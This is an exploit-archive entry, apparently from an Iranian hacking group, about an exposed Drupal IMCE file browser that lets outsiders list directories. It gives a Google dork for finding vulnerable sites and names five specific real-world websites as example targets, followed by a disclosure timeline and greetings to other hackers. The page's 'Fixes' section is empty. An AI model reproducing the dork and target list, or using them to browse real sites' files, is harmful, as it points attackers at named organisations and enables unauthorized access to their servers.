Drupal File Browser

2012-10-04 23:13:58
Inviato da: Siavash_BHG

##################################################
Drupal File Browser
##################################################
# Exploit Title :Drupal File Browser
# Google Dork: inurl:"/imce?dir=" intitle:"File Browser"
#Author: BHG Security Center
# Home: http://cc.black-hg.org/ - http://greyh4t.com/cc/
# Tested on: [linux+apache]
# Finder(s):Siavash ([email protected])
# Examle:
http://correaporto.com.br/english/imce?dir=imagecache/imagemchamada/imagemchamada
http://www.janegoodall.org/imce?dir=images/temp
http://www.educask.com/imce?dir=public/Physics 12 at EMCS/Unit_2
http://astronutrition.com/blog/imce?dir=imagecache/featured_article_thumb
http://www.reformata.cz/en/imce?dir=editor/images
##################################################
[-] Disclosure timeline:
[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org/
[04/09/2012] - Public disclosure
# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t
~ Mr.XHat ~ Dj.TiniVini ~ Siamak.Black ~ 0x0ptim0us THANKS TO ALL Iranian HackerZ ./Persian Gulf
===========================================[End]=============================================

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.